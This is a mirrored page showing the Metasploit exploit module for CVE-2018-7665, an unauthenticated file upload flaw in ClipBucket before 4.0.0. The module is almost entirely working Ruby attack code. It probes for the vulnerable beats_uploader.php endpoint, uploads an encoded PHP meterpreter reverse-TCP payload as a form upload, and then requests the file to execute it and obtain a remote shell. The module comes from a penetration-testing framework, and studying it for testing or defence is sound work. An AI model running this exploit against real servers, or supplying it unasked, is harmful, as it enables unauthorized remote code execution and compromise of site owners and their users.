Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/http/clipbucket_fileupload_exec.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework

3
##

4


5
class MetasploitModule < Msf::Exploit::Remote

6
  Rank = ExcellentRanking

7


8
  include Msf::Exploit::Remote::HttpClient

9
  include Msf::Exploit::FileDropper

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",

16
        'Description' => %q{

17
          This module exploits a vulnerability found in ClipBucket versions before 4.0.0 (Release 4902).

18
          A malicious file can be uploaded using an unauthenticated arbitrary file upload vulnerability.

19
          It is possible for an attacker to upload a malicious script to issue operating system commands.

20
          This issue is caused by improper session handling in /action/beats_uploader.php file.

21
          This module was tested on ClipBucket before 4.0.0 - Release 4902 on Windows 7 and Kali Linux.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'www.sec-consult.com', # Vulnerability Discovery, PoC

26
          'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit module

27
        ],

28
        'References' => [

29
          [ 'CVE', '2018-7665' ],

30
          [ 'EDB', '44250' ]

31
        ],

32
        'DefaultOptions' => {

33
          'SSL' => false,

34
          'PAYLOAD' => 'php/meterpreter/reverse_tcp',

35
          'Encoder' => 'php/base64'

36
        },

37
        'Platform' => ['php'],

38
        'Arch' => ARCH_PHP,

39
        'Targets' => [

40
          ['Clipbucket < 4.0.0 - Release 4902', {}]

41
        ],

42
        'Privileged' => false,

43
        'DisclosureDate' => '2018-03-03',

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])

56
      ]

57
    )

58
  end

59


60
  def uri

61
    return target_uri.path

62
  end

63


64
  def check

65
    vprint_status('Trying to detect ClipBucket on target.')

66


67
    # check for readme file

68
    res = send_request_cgi({

69
      'method' => 'GET',

70
      'uri' => normalize_uri(uri, 'readme')

71
    })

72


73
    unless res

74
      vprint_error('Connection failed')

75
      return CheckCode::Unknown

76
    end

77


78
    unless res.code == 200 && res.body.include?('ClipBucket')

79
      vprint_error('Could not find readme')

80
      return CheckCode::Safe

81
    end

82


83
    # check for beats_uploader.php file

84
    res = send_request_cgi({

85
      'method' => 'GET',

86
      'uri' => normalize_uri(uri, 'actions', 'beats_uploader.php')

87
    })

88


89
    unless res

90
      vprint_error('Connection failed')

91
      return CheckCode::Unknown

92
    end

93


94
    unless res.code == 200

95
      vprint_error('Could not find beats_uploader.php')

96
      return CheckCode::Safe

97
    end

98


99
    Exploit::CheckCode::Appears

100
  end

101


102
  def exploit

103
    # generate the PHP meterpreter payload

104
    stager = '<?php '

105
    stager << payload.encode

106
    stager << '?>'

107


108
    # Setting POST data

109
    post_data = Rex::MIME::Message.new

110
    post_data.add_part(stager, content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = 'form-data; name="file"; filename="pfile.php"') # payload

111
    post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="plupload"') # require for uploading

112
    post_data.add_part('agent22.php', content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="name"')

113
    data = post_data.to_s

114


115
    print_status('Uploading payload..')

116
    res = send_request_cgi({

117
      'method' => 'POST',

118
      'uri' => normalize_uri(uri, 'actions', 'beats_uploader.php'),

119
      'data' => data,

120
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"

121
    })

122


123
    jsonres = res.get_json_document

124


125
    # If the server returns 200 and success yes, we assume we uploaded the malicious

126
    # file successfully

127
    unless res && res.code == 200 && jsonres['success'] == 'yes'

128
      fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")

129
    end

130
    print_good('Looking For Payload..')

131
    pdir = jsonres['file_directory']

132
    file_name = jsonres['file_name']

133
    pext = jsonres['extension']

134
    print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext}")

135


136
    # Payload name

137
    pname = "#{file_name}.php"

138


139
    # Cleanup is Good Idea .

140
    register_files_for_cleanup(pname)

141


142
    print_status("Executing Payload [ #{uri}/actions/#{pdir}/#{pname} ]")

143
    res = send_request_cgi({

144
      'method' => 'GET',

145
      'uri' => normalize_uri(uri, 'actions', pdir, pname)

146
    })

147


148
    # If we don't get a 200 when we request our malicious payload, we suspect

149
    # we don't have a shell, either.

150
    if res && res.code != 200

151
      print_error('Unexpected response, probably the exploit failed')

152
    end

153
  end

154
end

155


156